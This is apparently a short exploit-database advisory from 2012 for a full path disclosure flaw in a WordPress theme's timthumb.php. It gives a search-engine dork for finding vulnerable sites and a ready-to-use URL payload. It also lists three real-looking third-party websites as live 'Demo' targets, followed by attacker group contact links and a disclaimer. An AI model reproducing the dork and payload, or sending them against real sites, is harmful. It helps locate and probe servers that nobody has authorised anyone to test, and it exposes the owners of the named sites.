Wordpress display theme Full Path Disclosure Vulnerability

# Exploit Title: Wordpress display theme Full Path Disclosure vulnerability
# Date: 13/01/2012
# Author: The Black Devils
# Category : [ webapps ]
# Type : php
# Tested on: [Windows] & [Ubuntu]
# Dork : allinurl:/wp-content/themes/display/
#------------------

http://localhost/wp-content/themes/display/framework/includes/timthumb.php?src=/wp-content/uploads/

Demo
http://resporton.com/wp-content/themes/display/framework/includes/timthumb.php?src=/wp-content/uploads/
http://www.theartsgarage.com/wp-content/themes/display/framework/includes/timthumb.php?src=/wp-content/
http://burstinwithbroadway.com/wordpress/wp-content/themes/display/framework/includes/timthumb.php?src=/wp-content/



#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------




//The information contained within this publication is

//supplied "as-is"with no warranties or guarantees of fitness

//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts

//responsibility for any damage caused by the use or misuse of

//this information